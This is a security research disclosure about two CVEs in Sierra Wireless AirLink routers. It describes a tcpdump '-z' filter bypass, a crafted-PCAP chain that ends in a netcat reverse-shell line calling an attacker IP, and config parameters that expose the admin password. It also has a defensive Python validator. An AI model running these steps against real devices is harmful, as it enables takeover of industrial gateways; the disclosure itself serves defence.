Sierra Wireless Airlink ACEmanager Vulnerabilities

30 Jan 2023

By OTORIO's Research Team

OTORIO researchers recently uncovered two vulnerabilities that affect multiple models of wireless IIoT devices made by Sierra Wireless, a Semtech company (NASDAQ: SMTC) and leading vendor of critical infrastructure connectivity. The vulnerabilities leave the devices at risk of remote code execution. They are part of OTORIO’s wireless IIoT attack surface analysis research, which security researcher Roni Gavrilov will present at the upcoming S4x23 conference on February 15, 2023, in Miami.

The Sierra Wireless AirLink family of wireless gateways and modems offers customers solutions for various industrial, enterprise, and in-vehicle applications.

Vulnerabilities identified by OTORIO are present in the following AirLink products running the ALEOS operating system:

  • ALEOS software releases prior to and including version 4.9.7 (ES450, GX450)
  • ALEOS software releases prior to version 4.16.0 (MP70, RV50, RV50x, RV55, LX40, LX60)

Sierra Wireless and ICS-CERT (CISA) issued advisories regarding the vulnerabilities.

Details: Sierra Wireless AirLink IIoT Vulnerabilities

CVE-2022-46649 - Remote Code Execution

A user with valid ACEManager credentials and access to the ACEManager interface can manipulate the IP-logging operation to execute arbitrary shell commands on the device.

CVSS v3.1 score: 8.0 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

A vulnerability in the ACEManager web service allows command injection through improper handling of the “-z” flag (which supplies a post-rotate command to tcpdump) in requests made to /cgi-bin/iplogging.cgi.

This vulnerability is a bypass of a patch released by Sierra Wireless in April 2019 to address CVE-2018-4061, reported by Talos.

The patch for the original vulnerability filtered the “-z” flag of the tcpdump command that the ACEManager web interface exposes.

Figure: Filtering logic for the unsafe parameter in iplogging.cgi

As you can see in the screenshot above, the regular expression removes any “-z” flag (the post-rotate command) as long as it is followed by a space, tab, form feed, or vertical tab, as in "tcpdump -z reboot", which was previously used to exploit the same interface in CVE-2018-4061.

However, this check is insufficient, because tcpdump also accepts the command attached directly to the flag, without any spacing. For example, “-zreboot” easily bypasses the nearly 3-year-old patch for the previously discovered CVE.
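The following Python is an added illustration of the defensive point made above; it is not OTORIO's, Sierra Wireless's, or tcpdump's code. It reconstructs the whitespace-dependent denylist filter described in the text (the exact regular expression is an assumption drawn from that description) and places next to it an allowlist-based validator, which is the shape a robust fix takes: instead of stripping known-bad spellings of one flag, it accepts only a small set of expected options with strictly formed values and rejects everything else. The permitted option set and value pattern are assumptions for the example.

```python
import re
import shlex

# Assumed reconstruction of the original check: "-z" is stripped only when it
# is followed by a space, tab, form feed or vertical tab.
_WEAK_Z = re.compile(r"-z[ \t\f\v]+")


def weak_filter(args: str) -> str:
    """Denylist approach: delete '-z' plus the spacing that follows it."""
    return _WEAK_Z.sub("", args)


def weak_filter_neutralises(args: str) -> bool:
    """True if no token resembling a post-rotate flag survives the filter."""
    return "-z" not in weak_filter(args)


# Allowlist approach (assumed option set for this example): only the options
# the IP-logging feature legitimately needs, each with a strictly formed value.
# Every other token, including any spelling of "-z" and the "-r"/"-w" flags that
# ACEManager manages itself, is rejected outright rather than rewritten.
_FLAGS_NO_ARG = {"-n", "-nn", "-v"}
_FLAGS_WITH_ARG = {"-i", "-s", "-C"}  # interface, snaplen, rotate size
# Values may not start with '-' and may not contain '/', quotes or whitespace.
_SAFE_VALUE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.:]*$")


def hardened_validate(args: str) -> bool:
    """Return True only if every token is an allowlisted option/value pair."""
    try:
        tokens = shlex.split(args)
    except ValueError:  # unbalanced quotes: refuse rather than guess
        return False
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in _FLAGS_NO_ARG:
            i += 1
        elif tok in _FLAGS_WITH_ARG:
            if i + 1 >= len(tokens) or not _SAFE_VALUE.match(tokens[i + 1]):
                return False
            i += 2
        else:
            return False  # unknown option, bare filter expression, or "-z..."
    return True


if __name__ == "__main__":
    # Constructed inputs: the spaced and unspaced forms discussed in the post.
    for sample in ("-i eth0 -s 0", "-i eth0 -z reboot", "-i eth0 -zreboot"):
        print(f"{sample!r:28} weak filter stops it: {weak_filter_neutralises(sample)!s:5} "
              f"allowlist accepts it: {hardened_validate(sample)}")
```

The denylist stops the spaced form and misses the unspaced one; the allowlist rejects both, and also rejects user-supplied "-r" and "-C", which the rest of this write-up shows are needed for the full chain.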

Sending the following POST request will successfully reboot the device:

Figure: iplogging.cgi POST request rebooting the device

Executing an arbitrary binary on the system is already a problem that should be addressed. Still, without additional work, this vulnerability allows only limited command execution on the target machine.

Inspecting the tcpdump source code shows that the -z binary is executed using `execlp(any_binary, filename)`. In our case, the filename is hardcoded to "/tmp/iplogging.pcap", which limits us to the binaries already on the machine and doesn’t allow any user-controlled parameters. This adds another layer of complexity to achieving a remote shell on the machine.

Figure: tcpdump execution of the post-rotate command

To bypass this limitation, we found a workaround by inserting crafted data into the "/tmp/iplogging.pcap" file, making the file both a valid PCAP and a valid shell script, along with “sh” as the post-rotation command.

Data can be inserted into the target PCAP file by transmitting it directly to the appropriate interface. However, as other communication on the interface may cause issues, an alternative solution is to use the "/cgi-bin/iplogging_upload.cgi" page.

Here is how it was done:

  1. Creating a malicious PCAP: The file must: a) pass tcpdump's validation, b) be a valid and functional shell script, and c) be large enough to trigger tcpdump's rotation logic (over 1MB). Luckily, /bin/sh skips invalid lines as long as they do not contain special characters, which makes this feasible. The file was successfully generated using “scapy”, making sure to place the sh commands between newlines, avoid nulls, include some random data to reach 1 MB, and convert to PCAPNG format at the end.

  2. Uploading the malicious PCAP: Using "iplogging_upload.cgi", we can upload our malicious PCAP file, which is saved to the fixed path "/tmp/iplogging_params.tcp".

    Figure: iplogging_upload.cgi POST request

  3. Executing the tcpdump command: We used the "iplogging.cgi" page to execute the tcpdump command with the following flags:

    1. "-r /tmp/iplogging_params.tcp": Causes tcpdump to read the incoming traffic from our malicious PCAP file instead of the Ethernet interface.

    2. "-w /tmp/iplogging.pcap": Added automatically by ACEManager; instructs tcpdump to write the incoming traffic (our PCAP file) to the predefined file, which is not under our control.

    3. "-zsh": Set the "post rotate command" as sh. It causes /bin/sh to be executed with "/tmp/iplogging.pcap" as a parameter every time the PCAP rotation occurs.

    4. "-C 1": Defines a rotation to be done every 1MB of traffic.

Figure: iplogging.cgi POST request

At this phase, the tcpdump program reads our crafted PCAP file (“/tmp/iplogging_params.tcp”) and writes it to the predefined output file (“/tmp/iplogging.pcap”). Once the first MB of data is reached, it executes /bin/sh with a single parameter: the 1MB file, now stored in “/tmp/iplogging.pcap”, containing the data from our crafted PCAP. /bin/sh evaluates the file line by line, ignores the PCAP header as "bad lines", and continues to our reverse-shell command, embedded as a separate line: ‘nohup nc {IP} {PORT} -e /bin/sh &’.

Figure: Reverse shell on AirLink device

CVE-2022-46650 - Exposure of Sensitive Information

A user with valid ACEManager credentials and access to the ACEManager interface can reconfigure the device to expose the ACEManager credentials on the pre-login status page. This leads to a persistent backdoor to the system and cleartext exposure of the admin password.

CVSS v3.1 score: 4.5 (AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)

The Embedded_Ace_Set_Task.cgi executable allows modification of configuration values within the configuration manager. An attacker could exploit this by enabling the “Device Status Screen” configuration parameter (55052) and adding the password parameter (5003) to the list of parameters displayed on the pre-login page (55053).

Figure: Embedded_Ace_Set_Task.cgi POST request

As a result, the password becomes visible on the pre-login page:

Figure: Pre-login page with admin password exposed

Mitigation

OTORIO responsibly disclosed these vulnerabilities to Sierra Wireless and CISA.  Both organizations’ corresponding advisories can be found here:

Sierra Wireless released updated firmware to address these vulnerabilities. Users are urged to update their devices, restrict access to the web interface, and use strong credentials. Devices whose web interface is exposed to the WAN are particularly at risk, and immediate action is recommended.

We appreciate the professional manner in which Sierra Wireless disclosed the vulnerabilities and the coordination of the U.S. Cybersecurity and Infrastructure Security Agency (CISA).
